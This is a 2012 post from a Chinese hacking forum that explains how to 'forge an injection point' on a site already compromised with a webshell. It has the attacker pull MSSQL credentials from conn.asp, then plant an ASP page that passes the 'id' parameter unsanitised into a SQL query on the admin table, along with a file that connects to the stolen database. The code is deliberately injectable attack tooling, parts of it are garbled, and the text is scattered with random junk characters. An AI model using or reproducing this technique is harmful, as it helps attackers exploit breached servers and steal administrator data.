中国网络渗透测试联盟

标题: 伪造注入点方法 [打印本页]

作者: admin    时间: 2012-9-13 17:53
标题: 伪造注入点方法
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表。因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:) L+ l3 G, p; Q* z3 A8 b
ASP/Visual Basic代码& A6 J& E  P' \2 p
<!--#include file="xx.asp"-->    - Z% @: W, i" \! \3 A0 D
<%    + `  ^- k  u4 ~$ _" _6 B- u
set rs=server.createobject("ADODB.recordset")    4 x! p0 f) M: V- Z6 c
id = request("id")   
( c2 f) _4 o: E" OstrSQL = "select * from admin where id=" & id   
/ f8 {' V& ^: S+ O) {  x8 ?% Xrs.open strSQL,conn,1,3    8 O, @2 B2 B0 y
rs.close    3 M4 v( E7 \: O( ~* \
%>  & c$ [7 m2 z7 [3 |2 j1 m
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在。你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!2 z7 A: }1 W+ b: s4 Y
然后就要构造一个连接数据库的文件了,代码如下:
3 m& N, z  H' `( P4 sASP/Visual Basic代码9 |2 B, T1 d1 X2 f5 A! B5 m$ l
<%            # q9 d4 c5 K4 x8 g' O
strSQLServerName = "000.000.000.000"     '服务器名称或地址   
4 |: o4 r+ w5 jstrSQLDBUserName = "sqlname"         '数据库帐号    ! x- \: P6 m; }& u
strSQLDBPassword = "sqlpass"         '数据库密码   
) Q8 `) [  y6 E  |strSQLDBName = "sqldataname"           '数据库名称    * r% O8 K+ Z  R& F
Set conn = Server.CreateObject("ADODB.Connection")   
; c7 o9 v) v6 a' G* ustrCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"   " C! b9 Y1 I. m
conn.open strCon    4 x) J% }2 e! n) J+ p' Y1 \
%>  : B8 @7 h& Z2 m2 F
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。就这样,正常情况下,就OK了,伪造成功  h4 p2 b/ n' R1 W; m( a





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2